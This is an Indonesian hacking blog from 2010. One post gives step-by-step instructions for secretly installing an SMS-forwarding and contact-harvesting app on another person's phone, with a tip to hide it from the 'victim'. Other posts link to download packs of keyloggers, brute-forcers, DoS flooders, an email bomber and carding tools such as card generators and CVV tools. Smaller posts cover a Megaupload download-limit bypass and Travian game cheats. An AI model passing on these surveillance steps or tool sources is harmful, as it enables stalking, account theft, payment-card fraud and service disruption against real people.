Fish

Welcome

Selamat Datang di Blognya Orang Toli-toli

kaki kucing ada berapa??

Jumat, 07 Mei 2010

Software Sadap Sms Orang Terdekat Kita

Sebuah layanan gratis untuk memonitor ponsel diluncurkan oleh Bloove.com. Fitur yang ada di antaranya adalah mem-forward SMS (yang juga berarti menyadap SMS), mengimport kontak dari ponsel yang terdaftar ke database Bloove, bahkan Anda bisa mengirim SMS lewat layanan ini. Persyaratan yang paling penting agar dapat memfungsikan layanan ini adalah ponsel yang dijadikan target harus terintegrasi koneksi GPRS. Sekarang tunggu apa lagi? Let's try it!

Caranya tidak terlalu rumit. Berikut tutorial untuk menyadap SMS lewat Internet :

1. Sebelumnya silahkan lihat compatibel list (tipe ponsel yang cocok dengan layanan ini). Bila ponsel target ada di dalamnya, langsung saja membuat akun agar dapat menggunakan layanan ini. Segeralah mendaftarkan diri ke www.bloove.com (gratis - tidak dipungut biaya sepeserpun) untuk mendapatkan akun. Isi formulir registrasi, Anda hanya butuh email untuk mendaftar.






2. Abaikan saja dulu pada tab Agent ID.


3. Setelah registrasi selesai Anda akan langsung digiring masuk ke halaman profile. Anda akan disuruh mengisi tab Enter ID displayed by Agent. Abaikan lagi.














4. Kini yang perlu Anda lakukan adalah men-setting ponsel target agar dapat tersinkronisasi dengan database Bloove. Pertama download aplikasi ini (http://bloove.com/m) menggunakan ponsel target. Atau Anda bisa mendownload-nya langsung dari PC/Laptop kemudian transfer kan ke ponsel target. Jangan lupa install aplikasi tersebut di ponsel target.

5. Setting dulu permission (izin)-nya (untuk hape Java), ga tahu yang lain.

Option > Application access > Communication > Network access > Always allowed > Yes
Option > Application access > Communication > Messaging > Always allowed > Yes
Option > Application access > Communication > Connectivity > Always allowed > Yes
Option > Application access > Data access > Multimedia recording > Always allowed > Yes
Option > Application access > Data access > Read user data > Always allowed > Yes
Option > Application access > Data access > Add and edit data > Always allowed > Yes
Option > Application access > Data access > Smart card > Always allowed > Yes
Option > Application access > Auto-start > Always allowed > Yes


6. Catat ID yang Anda dapatkan. Isikan ID tersebut di tab Enter ID displayed by Agent yang Anda abaikan tadi. Ikuti petunjuk di bawahnya. Isikan tipe ponsel target.

7. Bila status online berarti ponsel tersebut berada dalam jangkauan GPRS yang telah tersinkronisasi dengan Bloove. Yang berarti pula ponsel target telah resmi dimata - matai. Heheh.. :-D

Ingat, satu akun untuk satu nomor handphone saja. Sebenarnya masih banyak fitur 'mengejutkan' yang tersedia di layanan ini. Jika ingin tahu coba saja sendiri! Namun sayang untuk tipe hape ber-platform Java hanya bisa mengimport kontak dari hape target. Sedikit tips dari saya, sebisa mungkin sembunyikan aplikasi ini agar tidak ketahuan korban. Tidak perlu khawatir dengan pulsa target, karena hanya di-charged biaya GPRS yang sangat kecil nominal nya.blogger-emoticon.blogspot.com
Anyway, tutorial hacking SMS ini hanyalah sekedar info. Tidak ada niat jahat yang terselubung, penilaian akhir saya kembalikan pada Anda. Terakhir, saya berpesan agar menggunakan layanan ini dengan benar dan jangan sampai melanggar kode etik (paling ngga jangan terlalu lah).

Rabu, 05 Mei 2010

Cara Mudah Download Unlimited di Megaupload

Banyak orang yang kadang-kadang ada masalah ketika download dari Megaupload.com Berikut beberapa solusi yang dapat Anda coba untuk mendapatkan unlimited download atau download sepuasnya dari megaupload seperti pengguna premium account.

Berikut adalah langkah-langkah:

1) Jika Anda sudah mendownload toolbar Megaupload dan diinstal pada komputer anda, uninstall terlebih dahulu karena toolbar tersebut berisi spyware.


2) Download Mozilla Firefox browser, kalau sudah punya ikuti langkah selanjutnya.


3) Setelah Install firefox, gunakan add-ons dari firefox sebut saja user agent switcher bisa didownload dari sini.


4) Setelah menambahkan addon ini, pergi ke:

menu —> Tool —> user agent swither —> option —> add


5) Ikuti ini untuk mengisi formulir yang ada:


Description : MEGAUPLOAD
User agent : Mozilla/4.0 ( compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar )


Selesai . . ,
sebelum download di megaupload pergi dahulu ke


tool —> user agent —> megaupload


sekedar Trik dari Hackertoliz. anda bisa download sepuasnya di megaupload tanpa menunggu waktu yang lama.

selamat mencoba . .
semoga bermanfaat . .

Free download Tool Hacking Lengkap 2009.

Siapa yang butuh koleksi tool hacking di bulan Ramadhan ini ??
hayo". :))

sekedar share ke para peminat hacking seperti saya.
hehehehehehe

disini lengkap sekali.
puluhan tool hacking, mulai dari :

  • Tool hacking wireless
  • keyloggers
  • Mail Bomber
  • Scanners
  • Tool Crackers



mau ??
silahkan sedot toolnya di link bawah ini :
Free Download Kumpulan tool Hacking *klik disini


mungkin disana gratis download disana tetapi sebagian dari tool tersebut ada yang shareware, kita harus membayar untuk mempergunakannya.
ingatt !! masih sebagian saja.

Download CD Khusus Tool Hacking dan Cracking Gratis

Photobucket


XxxPass-Team 2007 | Danger Cracking & Hacking Tools - Ver 1.0

- Exploit Collection (4 Tools)
- Google Hacking (4 Tools)
- Keyloggers (5 Tools)
- Binder & Packer (15 Tools)
- Flood_DOS (20 Tools)
- Messenger (11 Tools)
- Bruter (9 Tools)
- Anonimity (1 Tool)
- !!! $$$ !!! (13 Tools)
- AIO

Exploit Collection

1. 10377 Exploit
2. SMF ShoutBox Xss & HTML Injection
3. SMF Ultimate Shoutbox Cookie Disclosure Exploit
4. Firefox_BuG

Messenger

  • 1. MSN Extreme 3.0
  • 2. MSN Spy Lite v1.0
  • 3. Yahoo Hack!
  • 4. Hotmail Email Hacker
  • 5. Hotmail Hacker Gold
  • 6. HotmailHack
  • 7. YahooUltraCracker
  • 8. winks,moods,mugins,weemees and meegos + Installer
  • 9. MSN Messenger Account Cracker v2.0
  • 10. SH Yahoo Pass Sender 1.1
  • 11. Yahoo Password Decoder

Google Hacking

1. Alt GooGle
2. Google Version 1.2
3. Google H4ck3r (3 programs)
4. GooLink

Keyloggers

  • 1. Elgolf 1.0 Beta
  • 2. ESK KeyLogger
  • 3. Glog Keylogger
  • 4. HermanAgent
  • 5. IKlogger0.1

Bbruter

1. WebCrack v4.0
2. Brutus
3. Crack FTP
4. FTP Brute Hacker
5. phpbb bruteforcer
6. PhpBB Pass Extractor
7. phpBB Cracker
8. Email Cracker
9. FTP Brute Forcer

!!! $$$ !!!

  • 1. Cmaster
  • 2. CC Verify
  • 3. CWizard
  • 4. THCC
  • 5. Visa Card Generator 06
  • 6. Carcabot_Mass_Email
  • 7. CcHack
  • 8. CC-Fake
  • 9. cvv2c
  • 10. DesertCVV2
  • 11. id-fake
  • 12. Paypal-Link-Spoofed
  • 13. HoW to get Credit Cards Fresh and Fastest

AIO

1. Uploader for All
2. Cool Small Usefull Dp

Flood DOS
  • 1. Flowbabeflow
  • 2. FreeSiteKiller V 2.01
  • 3. Webxgrab
  • 4. Web Attacker ENG
  • 5. TheRapist-Dos Attacker
  • 6. HybridFlood2
  • 7. Ati-russ 3.0
  • 8. Http Bomber v1.001b
  • 9. Sprut
  • 10. DoS_5
  • 11. etherflood
  • 12. DoSAttacker
  • 13. phpBB Dos
  • 14. phpBB Attacker
  • 15. Ping Attack
  • 16. Site Nuke
  • 17. Divine Intervention
  • 18. UC Forum Spammer
  • 19. Inferno Nuker
  • 20. Multiple Site Flood

Mau ?? 176 MB.
silahkan download di link bawah ini.
==> via Indowebster.

"Free Download Tool Hacking dan Cracking *klik disini"

password ==> XxxPass_DJ_haselking


==> via Rapidshare

1. http://rapidshare.com/files/85433778/XxxPass-C_H_Ver1.0-_2007-part1_up_by_juur.xup.pl.part1.rar

2. http://rapidshare.com/files/85426770/XxxPass-C_H_Ver1.0-_2007-part1_up_by_juur.xup.pl.part2.rar

Pass : XxxPass_DJ_haselking
Pass : -XxxPass_DJ_haselking

thank's to,
. http://ilmuwebsite.com

download e-book tentang hack, bahasa indonesia

lagi - lagi e-book .

tapi sekarang beda .
yang sering aku tunjukan ke kamukan biasanya berbahasa inggris tapi sekarang bedah ada lagi nee e-book buatan indonesia .

silahkan download disini :

http://www.yogyafree.net/paktani.zip
http://www.yogyafree.net/samarindahack.zip
http://www.yogyafree.net/malanghack.zip
http://www.yogyafree.net/kumpulbocah.rar



oiiia .
kitakan orang indonesia .
seharusnya kamu bangga dengan negara kita indonesia .

silahkan bergabung di :

http://www.banggamenjadiindonesia.com/


okee ??
good luck . . .

Cara mudah ngeBOMB email Orang Lain

Cara mudah ngeBOMB email Orang Lain

halo". lama tak jumpo. ...
kali ini HackerToliz posting cara Ngebomb email.
jadi pelajaran aja yaa.. jangan dipraktekkan betul lohh
saya tidak bertanggung jawab atas apa yang terjadi.

apa sih ngebomb email itu?

ngebomb email itu mengirim email dengan sesuka kita ke email target, dan juga email dapat kita kirim dalam jumlah banyak hingga mungkin akan memenuhi mailbox server/tukang pos (tempat smtp server yang rela mengirim email tanpa diverifikasi), dan jika email yang kita tuju (email korban/email asli) dibuka maka surat/email kita akan juga beralih memenuhi mailbox korban.

Jadi prinsip dari ngeBomb email ini adalah mengirim sebanyak-banyak pesan dengan email kita sehingga memenuhi server/tukang pos, dan jika si empunya email/korban menarik surat maka gantian korban yang mailboxnya kebanjiran surat kita. Akibat dari mail bomber ini adalah menghabiskan ruang hardisk server serta korban sehingga resourcenya habis.

udah jelas too??
itu penjelasan dari http://vbasiccode.blogspot.com.

lebih jelasnya lagi lihat video dibawah ini aja,
jangan lupa sediain kopi ma kacang Garuda asli buatan INDONESIA. yaa ??
loh kog malah promosi'in kacang garuda??





gmnn ??
jelas to..

tapi tool kali ini sangat sayang sekali,
karena masih harus menggunakan account Gmail.
jadi saya saranakan buat account Gmail lagi aja.

download toolnya di :
http://www.ziddu.com/download/6965078/EmailBomber-Pedasmaniscinta.rar.html

maaf saya upload di ziddu.
coz Indowebster masih ada kendala.

oiya kalao error kasih komentnya y !!
soalnya temen saya pas main di warnet g bisa jalan tapi pas saya jalankan di OS Vista engga terhubung jaringan LAN bisa.
buwat referensi aja.

semog tidak bermanfaat !!
kalao bermanfaat nanti malah bahaya. hehehehehe.
oleh : http://hackertoliz.blogspot.com

Tips mudah untuk Hack / Cheat Travian online

Travian adalah Jerman berbasis browser permainan yang mungkin salah satu yang paling sukses di luar sana saat. Saat ini ada lebih dari 3 juta pemain di seluruh dunia.



Travian
Travian Indonesia Online juga memberikan permainan pasar yang sangat goo dampak. Terdapat lebih dari 5000 pemain online yang terakhir kali saya diperiksa. Saya rasa ini dapat dianggap sebagai salah satu game online di sekitar jaringan.

Saya membuat sebuah ID dan ada tes untuk beberapa saat, sehingga saya menemukan beberapa bug s cara / tips (cheats) untuk memberikan keuntungan bermain Travian.


1. Periksa apakah anda pemain lawan yang online atau tidak

Keberhasilan tingkat cheat ini sangat bagus. I tried it myself ke tetangga saya player. Dan saya menilai keberhasilan menentukan apakah mereka sedang online atau tidak, hampir 100% bekerja.

Untuk melakukannya, Anda hanya perlu mengirimkan pesan ke lawan. Dan setelah beberapa menit, klik pesan terkirim item.

untuk jelasnya lihat gambar di :
http://zoiz.web.id/images/online.jpg

Teks dalam kotak merah berarti 'belum dibaca'. Jika sudah tidak ada pemberitahuan (yang belum dibaca status) beberapa jam setelah Anda mengirim pesan, berarti anda lawan yang sedang online.


Tapi meskipun status belum ada, Anda mungkin tidak akan lawan secara offline pada saat ini. Tetapi sebagian besar waktu, orang akan membaca pesan yang masuk segera J nice Travian Hack bukan?

2. Menggunakan Travian (Cheat / Hacking) Softwares

GreaseMonkey Mozilla Firefox adalah sebuah add-on yang memungkinkan Anda untuk menyesuaikan cara menampilkan sebuah halaman web menggunakan JavaScript bit kecil. GreaseMonkey dapat didownload dari sini.

Dan anda perlu mencari sesuai travian script dari mesin pencari seperti
Google, menggunakan kata kunci "Travian Script" atau yang lain. Anda mungkin ke tanah http://userscripts.org.

Mereka menyediakan berbagai travian script yang akan membantu Anda banyak bermain Travian. Anda dapat seperti antrian karena banyak tugas sebagai Travian bahkan mungkin jika anda tidak memiliki 'Travian Plus' diaktifkan.

Sebelum menginstal script, hanya pastikan GreaseMonkey add-on diaktifkan. Dan klik pada tombol INSTALL UserScripts.org disediakan untuk menginstal.


referensi :
http://zoiz.web.id